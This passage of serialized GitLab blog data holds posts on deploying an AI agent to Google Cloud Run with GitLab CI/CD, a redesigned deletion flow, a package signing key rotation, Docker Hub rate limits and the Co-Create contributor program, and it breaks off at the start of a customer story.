patterns.\n\nWhat impressed me most was how the agent automatically included the detailed payload structures for each action type. This level of detail transforms the diagram from a high-level overview into actionable documentation that other developers can immediately use.\n\n## Looking ahead\n\nThis demonstration represents just one use case for GitLab Duo Agent Platform. The same contextual understanding and collaborative approach that made documentation generation seamless can be applied to:\n\n* **Code reviews:** Agents can analyze merge requests with full project context  \n* **Testing:** Generate comprehensive test suites based on actual usage patterns  \n* **Debugging:** Trace issues across multiple services and components  \n* **Security scanning:** Identify vulnerabilities with understanding of your specific architecture  \n* **CI/CD optimization:** Improve pipeline performance based on historical data\n\nGitLab Duo Agent Platform will enter public beta soon so [join the wait list today](https://about.gitlab.com/gitlab-duo/agent-platform/).\n\nStay tuned to the [GitLab Blog](https://about.gitlab.com/blog/) and social channels for additional updates. GitLab Duo Agent Platform is evolving rapidly with specialized agents, custom workflows, and community-driven extensions on the roadmap.\n\n## Learn more\n\n- [Agentic AI guides and resources](https://about.gitlab.com/blog/agentic-ai-guides-and-resources/)\n- [GitLab Duo Agent Platform: What’s next for intelligent DevSecOps](https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/)\n- [What is agentic AI?](https://about.gitlab.com/topics/agentic-ai/)\n- [From vibe coding to agentic AI: A roadmap for technical leaders](https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/)\n",{"content":840,"config":849},{"title":841,"description":842,"authors":843,"heroImage":845,"date":836,"body":846,"category":679,"tags":847},"Fast and secure AI agent deployment to Google Cloud with GitLab","Follow this step-by-step guide, complete with a demo application, to learn how to use agentic AI, along with GitLab's native integrations and CI/CD components.",[844],"Regnard Raquedan","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670563/Blog/Hero%20Images/cloudcomputing.jpg","[Agentic AI](https://about.gitlab.com/topics/agentic-ai/) is transforming\nhow we build intelligent applications, but deploying AI agents securely and\nefficiently can be challenging. In this tutorial, you'll learn how to deploy\nan AI agent built with Google's Agent Development Kit\n([ADK](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-development-kit/quickstart))\nto Cloud Run using [GitLab's native\nintegrations](https://cloud.google.com/blog/topics/partners/understand-the-google-cloud-gitlab-integration)\nand [CI/CD components](https://docs.gitlab.com/ci/components/).\n\n\n## What are AI agents and why do they matter?\n\n\nAgentic AI represents a significant evolution in artificial intelligence. Unlike traditional generative AI tools that require constant human direction, AI agents leverage advanced language models and natural language processing to take independent action. These systems can understand requests, make decisions, and execute multistep plans to achieve goals autonomously.\n\n\nThis tutorial uses Google's ADK, a flexible and modular framework for developing and deploying AI agents. While optimized for Gemini and the Google ecosystem, ADK is model-agnostic, deployment-agnostic, and built for compatibility with other frameworks.\n\n\n## Our demo application: Canada City Advisor\n\n\nTo demonstrate the deployment process, we'll work with a practical example: the Canada City Advisor. This AI agent helps users find their ideal Canadian city based on their preferences and constraints.\n\n\nHere's how it works:\n\n\n* Users input their budget requirements and lifestyle preferences.  \n\n* The root agent coordinates two sub-agents:  \n\n  * A budget analyzer agent that evaluates financial constraints. This draws data obtained from the Canada Mortgage and Housing Corporation.  \n  * A lifestyle preferences agent that matches cities to user needs. This includes a weather service that uses [Open-Meteo](https://open-meteo.com/) to get the proper city information.  \n* The system generates personalized city recommendations\n\n\nThis multi-agent architecture showcases the power of agentic AI - different specialized agents working together to solve a complex problem. The sub-agents are only invoked when the root agent determines that budget and lifestyle analysis are needed.\n\n\n![Multi-agent architecture to develop demo application with agentic AI](https://res.cloudinary.com/about-gitlab-com/image/upload/v1751576568/obgxpxvlnxtzifddrrz1.png)\n\n\n## Prerequisites\n\n\nBefore we begin, ensure you have:\n\n\n* A Google Cloud project with the following APIs enabled:  \n\n  * Cloud Run API  \n  * Artifact Registry API  \n  * Vertex AI API  \n* A GitLab project for your source code  \n\n* Appropriate permissions in both GitLab and Google Cloud\n\n\n**Step 1: Set up IAM integration with Workload Identity Federation**\n\n\nThe first step establishes secure, keyless authentication between GitLab and Google Cloud using [Workload Identity Federation](https://cloud.google.com/iam/docs/workload-identity-federation). This eliminates the need for service account keys and improves security.\n\n\nIn your GitLab project:\n\n\n1. Navigate to **Settings > Integrations > Google Cloud IAM.**  \n\n2. Provide the following information:  \n\n   * **Project ID**: Your Google Cloud project ID  \n   * **Project Number**: Found in your Google Cloud console  \n   * **Pool ID**: A unique identifier for your workload identity pool  \n   * **Provider ID**: A unique identifier for your identity provider\n\nGitLab will generate a script for you. Copy this script and run it in your Google Cloud Shell to create the Workload Identity Federation.\n\n\n**Step 2: Configure Google Artifact Registry integration**\n\n\nNext, we'll set up the connection to Google Artifact Registry where our container images will be stored.\n\n\n1. In GitLab, go to **Settings > Integrations > Google Artifact Registry.**  \n\n2. Enter:  \n\n   * **Google Cloud Project ID**: Same as in Step 1  \n   * **Repository Name**: Name of an existing Artifact Registry repository  \n   * **Location**: The region where your repository is located\n\n**Important**: The repository must already exist in Artifact Registry. GitLab won't create a new one for you in this context.\n\n\nGitLab will generate commands to set up the necessary permissions. Run these in Google Cloud Shell.\n\n\nAdditionally, add these roles to your service principal for Cloud Run deployment:\n\n\n* `roles/run.admin`  \n\n* `roles/iam.serviceAccountUser`  \n\n* `roles/cloudbuild.builds.editor`\n\n\nYou can add these roles using the following gcloud commands:\n\n\n```shell\n\nGCP_PROJECT_ID=\"\u003Cyour-project-id>\" #replace\n\nGCP_PROJECT_NUMBER=\"\u003Cyour-project-number>\" #replace\n\nGCP_WORKLOAD_IDENTITY_POOL=\"\u003Cyour-pool-id>\" #replace\n\n\ngcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \\\n  --member=\"principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true\" \\\n  --role='roles/run.admin'\n\ngcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \\\n  --member=\"principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true\" \\\n  --role='roles/iam.serviceAccountUser'\n\ngcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \\\n  --member=\"principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true\" \\\n  --role='roles/cloudbuild.builds.editor'\n```\n\n\n**Step 3: Create the CI/CD pipeline**\n\n\nNow for the exciting part – let's build our deployment pipeline! GitLab's CI/CD components make this remarkably simple.\n\n\nCreate a `.gitlab-ci.yml` file in your project root:\n\n\n```unset\n\nstages:\n  - build\n  - test\n  - upload\n  - deploy\n\nvariables:\n  GITLAB_IMAGE: $CI_REGISTRY_IMAGE/main:$CI_COMMIT_SHORT_SHA\n  AR_IMAGE: $GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_LOCATION-docker.pkg.dev/$GOOGLE_ARTIFACT_REGISTRY_PROJECT_ID/$GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_NAME/main:$CI_COMMIT_SHORT_SHA\n\nbuild:\n  image: docker:24.0.5\n  stage: build\n  services:\n    - docker:24.0.5-dind\n  before_script:\n    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY\n  script:\n    - docker build -t $GITLAB_IMAGE .\n    - docker push $GITLAB_IMAGE\n\ninclude:\n  - template: Jobs/Dependency-Scanning.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Dependency-Scanning.gitlab-ci.yml\n  - template: Jobs/SAST.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/SAST.gitlab-ci.yml\n  - template: Jobs/Secret-Detection.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Secret-Detection.gitlab-ci.yml\n  - component: gitlab.com/google-gitlab-components/artifact-registry/upload-artifact-registry@main\n    inputs:\n      stage: upload\n      source: $GITLAB_IMAGE\n      target: $AR_IMAGE\n  - component: gitlab.com/google-gitlab-components/cloud-run/deploy-cloud-run@main\n    inputs:\n      stage: deploy\n      project_id: \"\u003Cyour-project-id>\" #replace\n      service: \"canadian-city\"\n      region: \"us-central1\"\n      image: $AR_IMAGE\n```\n\n\nThe pipeline consists of four stages:\n\n\n1. **Build**: Creates the Docker container with your AI agent  \n\n2. **Test**: Runs security scans (container scanning, dependency scanning, SAST)  \n\n3. **Upload**: Pushes the container to Artifact Registry  \n\n4. **Deploy**: Deploys to Cloud Run\n\n\nThe great thing about using [GitLab's CI/CD components](https://docs.gitlab.com/ci/components/) is that you only need to provide a few parameters - the components handle all the complex authentication and deployment logic.\n\n\n**Step 4: Deploy and test**\n\n\nWith everything configured, it's time to deploy:\n\n\n1. Commit your code and `.gitlab-ci.yml` to your GitLab repository.  \n\n2. The pipeline will automatically trigger.  \n\n3. Monitor the pipeline progress in GitLab's CI/CD interface.  \n\n4. Once complete, find your Cloud Run URL in the Google Cloud Console.\n\n\nYou'll see each stage execute:\n\n\n* Build stage creates your container.  \n\n* Test stage runs comprehensive security scans.  \n\n* Upload stage pushes to Artifact Registry.  \n\n* Deploy stage creates or updates your Cloud Run service.\n\n\n## Security benefits\n\n\nThis approach provides several security advantages:\n\n\n* **No long-lived credentials:** Workload Identity Federation eliminates service account keys.  \n\n* **Automated security scanning:** Every deployment is scanned for vulnerabilities.  \n\n* **Audit trail:** Complete visibility of who deployed what and when.  \n\n* **Principle of least privilege:** Fine-grained IAM roles limit access.\n\n\n## Summary\n\nBy combining GitLab's security features with Google Cloud's powerful AI and serverless platforms, you can deploy AI agents that are both secure and scalable. The integration between GitLab and Google Cloud eliminates much of the complexity traditionally associated with such deployments.\n\n> Use this tutorial's [complete code\nexample](https://gitlab.com/gitlab-partners-public/google-cloud/demos/ai-agent-deployment)\nto get started now. Not a GitLab customer yet? Explore the DevSecOps platform with [a free trial](https://about.gitlab.com/free-trial/).\n",[675,848,786],"google",{"featured":6,"template":789,"slug":850},"fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab",{"category":687,"slug":691,"posts":852},[853,865,876],{"content":854,"config":863},{"title":855,"description":856,"authors":857,"heroImage":859,"date":860,"body":861,"category":691,"tags":862},"Improving GitLab's deletion flow: What to expect in coming months","GitLab is enhancing its deletion flow for groups and projects with features like pending deletion, self-service recovery, and an extended 30-day recovery window. Here's what you need to know.\n",[858],"Christina Lohr","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663000/Blog/Hero%20Images/tanukilifecycle.png","2025-07-14","At GitLab, we're committed to continuously improving your experience across our platform. Today, we're excited to announce significant enhancements to our deletion flow for groups and projects. We are rolling out a series of improvements designed to protect your data, simplify recovery, and create a more intuitive experience across all pricing tiers.\n\n## Why we're making these changes\n\nOur current deletion flow has some inconsistencies that can lead to frustrating experiences. Free tier users have had limited or no options for recovering accidentally deleted content, projects in personal namespaces haven't had the same protections as those in groups, and group namespace paths have remained locked after deletion, preventing immediate reuse.\n\nWe've heard your feedback, and we're addressing these pain points with a comprehensive redesign of our deletion flow that will be rolled out in multiple iterations.\n\n## What has changed already\n\nOver the past quarter, we have implemented fundamental improvements to create a consistent deletion experience across all pricing tiers. These changes have eliminated the frustration of accidentally deleting important content with no recovery option.\n\n* [**Pending deletion for all users**](https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/#deletion-protection-available-for-all-users)**:** All deleted projects and groups now enter a \"pending deletion\" state before being permanently deleted, regardless of their pricing tier.  \n* [**Self-service recovery**](https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/#delayed-project-deletion-for-user-namespaces)**:** You can now restore your own content without contacting support, giving you more control and autonomy over your data.  \n* [**Clear status indicators**](https://gitlab.com/gitlab-org/gitlab/-/issues/502234)**:** We have standardized how deletion status is displayed across the platform, making it immediately clear when content is pending deletion.  \n* **Extended recovery window:** On July 10, 2025, we increased the pending deletion period from 7 to 30 days on GitLab.com. This means you now have ample time to recover from accidental deletions.\n\n## What's coming next\n\n### Currently in development\n\nBuilding on the foundation established in our first iteration, we are further enhancing your deletion experience with two key improvements:\n\n* [**Admin area consistency**](https://gitlab.com/groups/gitlab-org/-/epics/17372)**:** Deletions initiated from the Admin area will follow the same pending deletion process as deletions initiated directly from the group or project level, creating a unified experience across all access points.  \n* [**Immediate path reuse**](https://gitlab.com/gitlab-org/gitlab/-/issues/526081)**:** When you delete a project or group, its namespace path will be automatically renamed, allowing you to immediately reuse the original path for new content. This will remove the waiting period currently required to reuse namespace paths.\n\n### Planned for future release\n\nThe final phase will introduce a redesigned deletion experience that completes our vision for a modern, intuitive deletion system:\n\n* **Centralized \"Trash\" interface:** All your deleted content will be accessible in a dedicated \"Trash\" section, providing a familiar paradigm similar to what you're used to in other applications.  \n* [**Clear action separation**](https://gitlab.com/gitlab-org/gitlab/-/issues/541182)**:** We will create a clear distinction between \"Delete\" (temporary, recoverable) and \"Delete Permanently\" (irrevocable) actions to prevent accidental data loss.  \n* **Bulk management:** You'll be able to restore or permanently delete multiple items at once, making cleanup and recovery more efficient.\n\n## How these changes benefit you\n\nThese enhancements deliver several key benefits that will transform your experience with GitLab's deletion functionality.\n\n* **Protection against data loss** is provided through pending deletion and self-service recovery available across all tiers, giving you a safety net against accidental deletions. The **consistent experience** ensures the same deletion flow applies to all projects and groups, eliminating inconsistencies across the platform.\n\n* You'll gain **greater control** through enhanced visibility and management options for deleted content, with a familiar interface that makes recovery intuitive. **Improved workflow** efficiency will result from immediate path reuse and bulk management capabilities that streamline your content organization process.\n\n* Most importantly, you'll have **peace of mind** knowing that the extended 30-day recovery window ensures ample opportunity to recover important data, while the clear separation between temporary and permanent deletion actions prevents accidental data loss.\n\n## Your feedback matters\n\nAs always, we value your input. Please leave feedback in [the feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/538165).",[757],{"featured":6,"template":789,"slug":864},"improving-gitlab-deletion-flow-what-to-expect-in-coming-months",{"content":866,"config":874},{"title":867,"description":868,"authors":869,"heroImage":859,"date":871,"body":872,"category":691,"tags":873},"GitLab rotating Omnibus Linux package signing key","Learn who is impacted by the rotation of the GNU Privacy Guard (GPG) key and what you need to know.",[870],"GitLab","2025-04-16","As part of our standard security practices, GitLab is rotating the GNU Privacy Guard (GPG) key used to sign all Omnibus Linux packages on April 16, 2025. This key ensures the integrity of our packages, verifying that they have not been tampered with after creation in our CI pipelines. This key is distinct from the repository metadata signing key used by package managers and the GPG signing key for the GitLab Runner. GitLab is revoking the existing key and will begin signing upcoming packages using a new key with fingerprint `98BF DB87 FCF1 0076 416C 1E0B AD99 7ACC 82DD 593D`.\n\n**What do I need to do?**\n\nIf you currently validate the GPG signatures of GitLab Omnibus packages, you will need to update your copy of the package signing key. Packages published before this article will remain signed with the previous key.\n\nThe package signing key is separate from the repository metadata signing key used by your operating system’s package managers (like `apt` or `yum`). Unless you are specifically verifying package signatures or have configured your package manager to verify the package signatures, no action is required to continue installing GitLab Omnibus packages.\n\n**Where can I find the new key?**\n\nThe new key can be downloaded from `packages.gitlab.com` using the URL:\n\n[https://packages.gitlab.com/gitlab/gitlab-ee/gpgkey/gitlab-gitlab-ee-CB947AD886C8E8FD.pub.gpg](https://packages.gitlab.com/gitlab/gitlab-ee/gpgkey/gitlab-gitlab-ee-CB947AD886C8E8FD.pub.gpg)\n\nPlease check the documentation for more information concerning [verification of the package signatures](https://docs.gitlab.com/omnibus/update/package_signatures#package-signatures).\n\n**What do I do if I still have problems?**\n\nPlease open an issue in the [omnibus-gitlab issue tracker](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/new?issue&issuable_template=Bug).",[475,757,767],{"slug":875,"featured":6,"template":789},"gitlab-rotating-omnibus-linux-package-signing-key",{"content":877,"config":885},{"title":878,"description":879,"authors":880,"heroImage":807,"date":882,"body":883,"category":691,"tags":884},"Prepare now: Docker Hub rate limits will impact GitLab CI/CD","Learn how Docker Hub's upcoming pull rate limits will affect GitLab pipelines and what you can do to avoid disruptions.",[881],"Tim Rizzi","2025-03-24","On April 1, 2025, Docker will implement new [pull rate limits](https://docs.docker.com/docker-hub/usage/) to Docker Hub that may significantly impact CI/CD pipelines across the industry, including those running on GitLab. The most significant change is the 100 pulls-per-6-hours limit for unauthenticated users.\n\n## What's changing?\n\nStarting April 1, Docker will enforce the following pull rate limits:\n\n| User type | Pull rate limit per hour | Number of public repositories | Number of private repositories |\n|-----------|--------------------------|-------------------------------|--------------------------------|\n| Business, Team, Pro (authenticated) | Unlimited (fair use) | Unlimited | Unlimited |\n| Personal (authenticated) | 200 per 6-hour window | Unlimited | Up to 1 |\n| Unauthenticated users | 100 per 6-hour window per IPv4 address or IPv6 /64 subnet | Not applicable | Not applicable |\n\n\u003Cp>\u003C/p>\nThis is particularly important because:\n\n* GitLab's Dependency Proxy currently pulls from Docker Hub as an unauthenticated user.\n* Most CI/CD pipelines that don't use the Dependency Proxy pull directly from Docker Hub as unauthenticated users.\n* On hosted runners for GitLab.com, multiple users might share the same IP address or subnet, making them collectively subject to this limit.\n\n## How this impacts GitLab users\n\n**Impact on direct Docker Hub pulls**\n\nIf your CI/CD pipelines directly pull images from Docker Hub without authentication, they will be limited to 100 pulls per six-hour window per IP address. For pipelines that run frequently or across multiple projects sharing the same runner infrastructure, this will quickly exhaust the limit and cause pipeline failures.\n\n**Impact on GitLab Dependency Proxy**\n\nThe GitLab Dependency Proxy feature allows you to cache Docker images within GitLab to speed up pipelines and reduce external dependencies. However, the current implementation pulls from Docker Hub as an unauthenticated user, meaning it will also be subject to the 100 pulls-per-6-hours limit.\n\n**Impact on hosted runners**\n\nFor hosted runners on GitLab.com, we use [Google Cloud's pull-through cache](https://cloud.google.com/artifact-registry/docs/pull-cached-dockerhub-images). This mirrors the commonly pulled images and allows us to avoid rate limits. Job images defined as `image:` or `services:` in your `.gitlab-ci.yml` file, are not affected by rate limits.\n\nThings are slightly more challenging whenever images are pulled within the runner environment. The most common use case to pull images during runner runtime is to build an image using Docker-in-Docker or Kaniko. In this scenario, the Docker Hub image defined in your `Dockerfile` is pulled directly from Docker Hub and is likely to be affected by rate limits.\n\n## How GitLab is responding\n\nWe're actively working on solutions to mitigate these challenges:\n\n* **Dependency Proxy authentication:** We've added support for Docker Hub authentication in the [GitLab Dependency Proxy feature](https://gitlab.com/gitlab-org/gitlab/-/issues/331741). This will allow the Dependency Proxy to pull images from Docker Hub as an authenticated user, significantly increasing the rate limits.\n* **Documentation updates:** We've updated our [documentation](https://docs.gitlab.com/user/packages/dependency_proxy/#configure-credentials) to provide clear guidance on configuring pipeline authentication for Docker Hub.\n* **Internal infrastructure preparation:** We're preparing our internal infrastructure to minimize the impact on hosted runners for GitLab.com.\n\n## How you can prepare\n\n**Option 1: Configure Docker Hub authentication in your pipelines**\n\nFor pipelines that pull directly from Docker Hub, you can configure authentication to increase your rate limit to 200 pulls per six-hour window (or unlimited with a paid Docker Hub subscription).\n\nAdd Docker Hub credentials to your project or group CI/CD variables (not in your `.gitlab-ci.yml` file). Please refer to our [documentation on using Docker images](https://docs.gitlab.com/ci/docker/using_docker_images/#use-statically-defined-credentials) for detailed instructions on setting up the `DOCKER_AUTH_CONFIG` CI/CD variable correctly.\n\n**Option 2: Use the GitLab Container Registry**\n\nConsider pushing your frequently used Docker images to your [GitLab Container Registry](https://docs.gitlab.com/user/packages/container_registry/). This eliminates the need to pull from Docker Hub during CI/CD runs:\n\n1. Pull the image from Docker Hub.\n2. Tag it for your GitLab Container Registry.\n3. Push it to your GitLab Container Registry.\n4. Update your pipelines to pull from GitLab Container Registry.\n\n```\ndocker pull busybox:latest\ndocker tag busybox:latest $CI_REGISTRY_IMAGE/busybox:latest\ndocker push $CI_REGISTRY_IMAGE/busybox:latest\n```\n\nThen in your `.gitlab-ci.yml`:\n\n`image: $CI_REGISTRY_IMAGE/busybox:latest`\n\n**Option 3: Use GitLab Dependency Proxy**\n\nGitLab's Dependency Proxy feature provides a way to cache and proxy Docker images, reducing external dependencies and rate limit issues.\n\nCurrent authentication options:\n* GitLab 17.10: Configure Docker Hub authentication for the Dependency Proxy using [GraphQL API](https://docs.gitlab.com/user/packages/dependency_proxy/#configure-credentials-using-the-graphql-api)\n* GitLab 17.11: Use the new UI-based configuration in your group's settings (already available on GitLab.com)\n\nOnce authentication is properly configured, you can:\n\n1. Configure Docker Hub credentials in your group's Dependency Proxy settings:\n  - For GitLab 17.11+ (or current GitLab.com): Navigate to your group's settings > Packages & Registries > Dependency Proxy.\n  - For GitLab 17.10: Use the GraphQL API to configure authentication.\n2. Update your pipelines to use the Dependency Proxy URLs in your CI/CD configuration:\n`image: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/busybox:latest`\n\n**Option 4: Consider a Docker Hub paid subscription**\n\nFor organizations with heavy Docker Hub usage, upgrading to a paid Docker subscription (Team or Business) will provide unlimited pulls, which may be the most straightforward solution.\n\n## Best practices to reduce Docker Hub rate limit impact\n\nRegardless of which option you choose, consider these best practices to minimize Docker Hub rate limit impact:\n\n* Use specific image tags instead of `latest` to avoid unnecessary pulls.\n* Consolidate your Docker files to use the same base images across projects.\n* Schedule less critical pipelines to run outside of peak hours.\n* Use caching effectively to avoid pulling the same images repeatedly.\n\n**Note:** According to Docker Hub [documentation](https://docs.docker.com/docker-hub/usage/pulls/#pull-definition), the pull count is incremented when pulling the image manifest, not based on image size or number of layers.\n\n## Timeline and next steps\n\n**Now**\n  * Implement authentication for direct Docker Hub pulls.\n  * GitLab.com users can already configure Docker Hub authentication for the Dependency Proxy using either:\n    * The GraphQL API, or\n    * The UI in group settings\n  * Self-managed GitLab 17.10 users can configure Dependency Proxy authentication using the GraphQL API.\n\n**April 1, 2025**\n  * Docker Hub rate limits go into effect.\n\n**April 17, 2025**\n  * GitLab 17.11 will be released with UI-based Dependency Proxy authentication support for self-managed instances. \n\nWe recommend taking action well before the April 1 deadline to avoid unexpected pipeline failures. For most users, configuring the Dependency Proxy with Docker Hub authentication is the most efficient long-term solution.\n\n> Have questions or need implementation help? Please visit [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/526605) where our team is actively providing support.",[109,736,475],{"slug":886,"featured":91,"template":789},"prepare-now-docker-hub-rate-limits-will-impact-gitlab-ci-cd",{"category":698,"slug":702,"posts":888},[889,904,915],{"content":890,"config":902},{"title":891,"description":892,"authors":893,"heroImage":895,"date":896,"body":897,"category":702,"tags":898},"The Co-Create Program: How customers are collaborating to build GitLab","Learn how organizations like Thales, Scania, and Kitware are partnering with GitLab engineers to contribute meaningful features that benefit the entire community.",[894],"Fatima Sarah Khalid","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659756/Blog/Hero%20Images/REFERENCE_-_display_preview_for_blog_images.png","2025-01-30","This past year, over 800 community members have made more than 3,000 contributions to GitLab. These contributors include team members from global organizations like Thales, Scania, and Kitware, who are helping shape GitLab's future through the [Co-Create Program](https://about.gitlab.com/community/co-create/) — GitLab's collaborative development program where customers work directly with GitLab engineers to contribute meaningful features to the platform.\n\nThrough workshops, pair programming sessions, and ongoing support, program participants get hands-on experience with GitLab's architecture and codebase while solving issues or improving existing features.\n\n\"Our experience with the Co-Create Program has been incredible,\" explains Sébastien Lejeune, open source advocate at Thales. \"It only took two months between discussing our contribution with a GitLab Contributor Success Engineer and getting it live in the GitLab release.\"\n\nIn this post, we'll explore how customers have leveraged the Co-Create Program to turn their ideas into code, learning and contributing along the way.\n\n## The Co-Create experience\n[The GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit) helps contributors get started developing on GitLab. \"The advice I would give new contributors is to remember that you can't break anything with the GDK,\" says Hook. \"If you make a change and it doesn't work, you can undo it or start again. The beauty of GDK is that you can tinker, test, and learn without worrying about the environment.\"\n\nEach participating organization in the Co-Create Program receives support throughout their contribution journey:\n\n- __Technical onboarding workshop__: A dedicated session to set up the GitLab Development Kit (GDK) and understand GitLab's architecture\n- __1:1 engineering support__: Access to GitLab engineers for pair programming and technical guidance\n- __Architecture deep dives__: Focused sessions on specific GitLab components relevant to the issue the organization is contributing to\n- __Code review support__: Detailed feedback and guidance through the merge request process\n- __Regular check-ins__: Ongoing collaboration to ensure progress and address any challenges\n\nThis structure ensures that teams can contribute effectively, regardless of their prior experience with GitLab's codebase or the Ruby/Go programming language. As John Parent from Kitware notes, \"If you've never seen or worked with GitLab before, you're staring at a sophisticated architecture and so much code across different projects. The Co-Create Program helps distill what would take weeks of internal training into a targeted crash course.\"\n\nThe result is a program that not only helps deliver new features but also builds lasting relationships between GitLab and its user community. \"It's inspiring for our engineers to see the passion our customers bring to contributing to and building GitLab together,\" shares Shekhar Patnaik, principal engineer at GitLab. \"Customers get to see the 'GitLab way,' and engineers get to witness their commitment to shaping the future of GitLab.\"\n\n## Enhancing project UX with Thales\nWhen Thales identified opportunities to improve GitLab's empty project UI, they didn't just file a feature request — they built the solution themselves. Their contributions focused on streamlining the new project setup experience by simplifying SSH/HTTPS configuration with a tabbed interface and adding copy/paste functionality for the code snippets. These changes had a significant impact on developer workflows.\n\nThe team's impact extended beyond the UX improvements. Quentin Michaud, PhD fellow for cloud applications on the edge at Thales, contributed to improving the GitLab Development Kit (GDK). As a package maintainer for Arch Linux, Michaud's expertise helped improve GDK's documentation and support its containerization efforts, making it easier for future contributors to get started.\n\n\"My open source experience helped me troubleshoot GDK's support for Linux distros,” says Michaud. “While improving package versioning documentation, I saw that GitLab's Contributor Success team was also working to set up GDK into a container. Seeing our efforts converge was a great moment for me — it showed how open source collaboration can help build better solutions.\"\n\nThe positive experience for the Thales team means that Lejeune now uses the Co-Create Program as \"a powerful example to show our managers the return on investment from open source contributions.\"\n\n## Advancing package support with Scania\nWhen Scania needed advanced package support in GitLab, they saw an opportunity to contribute and build it themselves. \n\n\"As long-time GitLab users who actively promote open source within our organization, the Co-Create Program gave us a meaningful way to contribute directly to open source,\" shares Puttaraju Venugopal Hassan, solution architect at Scania.\n\nThe team started with smaller changes to familiarize themselves with the codebase and review process, then progressed to larger features. \"One of the most rewarding aspects of the Co-Create Program has been looking back at the full, end-to-end process and seeing how far we've come,\" reflects Océane Legrand, software developer at Scania. \"We started with discovery and smaller changes, but we took on larger tasks over time. It's great to see that progression.\" \n\nTheir contributions include bug fixes for the package registry and efforts to enhance the Conan package registry feature set, bringing it closer to general availability (GA) readiness while implementing Conan version 2 support. Their work and collaboration with GitLab demonstrates how the Co-Create Program can drive significant improvements to GitLab’s package registry capabilities.\n\n\"From the start, our experience with the Co-Create Program was very organized. We had training sessions that guided us through everything we needed to contribute. One-on-one sessions with a GitLab engineer also gave us an in-depth look at GitLab’s package architecture, which made the contribution process much smoother,\" said Juan Pablo Gonzalez, software developer at Scania. \n\nThe impact of the program goes beyond code — program participants are also building valuable skills as a direct result of their contributions. In [the GitLab 17.8 release](https://about.gitlab.com/releases/2025/01/16/gitlab-17-8-released/#mvp), both Legrand and Gonzalez were recognized as GitLab MVPs. Legrand talked about how the work she's doing in open source impacts both GitLab and Scania, including building new skills for her and her team: \"Contributing through the Co-Create Program has given me new skills, like experience with Ruby and background migrations. When my team at Scania faced an issue during an upgrade, I was able to help troubleshoot because I'd already encountered it through the Co-Create Program.\"\n\n## Optimizing authentication for high-performance computing with Kitware\nKitware brought specialized expertise from their work with national laboratories to improve GitLab's authentication framework. Their contributions included adding support for the OAuth2 device authorization grant flow in GitLab, as well as implementing new database tables, controllers, views, and documentation. This contribution enhances GitLab's authentication options, making it more versatile for devices without browsers or with limited input capabilities.\n\n\"The Co-Create Program is the most efficient and effective way to contribute to GitLab as an external contributor,\" shares John Parent, R&D engineer at Kitware. \"Through developer pairing sessions, we found better implementations that we might have missed working alone.\"\n\nAs a long-time open source contributor, Kitware particularly appreciated GitLab's approach to development. \"I assumed GitLab wouldn't rely on out-of-the-box solutions at its scale, but seeing them incorporate a Ruby dependency instead of building a custom in-house solution was great,” says Parent. “Coming from the C++ world, where package managers are rare, it was refreshing to see this approach and how straightforward it could be.\"\n\n## Building better together: Benefits of Co-Create\nThe Co-Create Program creates value that flows both ways. \"The program bridges a gap between us as GitLab engineers and our customers,\" explains Imre Farkas, staff backend engineer at GitLab. \"As we work with them, we hear their day-to-day challenges, the parts of GitLab they rely on, and where improvements can be made. It's great to see how enthusiastic they are about getting involved in building GitLab with us.\"\n\nThis collaborative approach also accelerates GitLab's development. As Shekhar Patnaik, principal engineer at GitLab, observes: \"Through Co-Create, our customers are helping us move our roadmap forward. Their contributions allow us to deliver critical features faster, benefitting our entire user base. As the program scales, there's a real potential to accelerate development on our most impactful features by working alongside the very people who rely on them.\"\n\n## Get started with Co-Create\nReady to turn your feature requests into reality? Whether you're looking to enhance GitLab's UI like Thales, improve package support like Scania, or optimize authentication like Kitware, the Co-Create Program welcomes organizations who want to actively shape GitLab's future while building valuable open source experience.\n\nContact your GitLab representative to learn more about participating in the Co-Create Program, or visit our [Co-Create page](https://about.gitlab.com/community/co-create/) for more information.\n",[899,900,901],"contributors","open source","customers",{"slug":903,"featured":91,"template":789},"the-co-create-program-how-customers-are-collaborating-to-build-gitlab",{"content":905,"config":913},{"title":906,"description":907,"authors":908,"heroImage":895,"date":910,"body":911,"category":702,"tags":912},"Kingfisher transforming the developer experience with GitLab","Learn how the international company focuses on DevSecOps, including automation, to reduce complexity in workflows for better efficiency.",[909],"Sharon Gaudin","2024-11-12","Kingfisher plc, an international home improvement company, has leaned into GitLab’s end-to-end platform to help it build a DevSecOps foundation that is revolutionizing its developer experience. And the company plans to continue that improvement by increasing its use of platform features, focusing on security, simplifying its toolchain, and 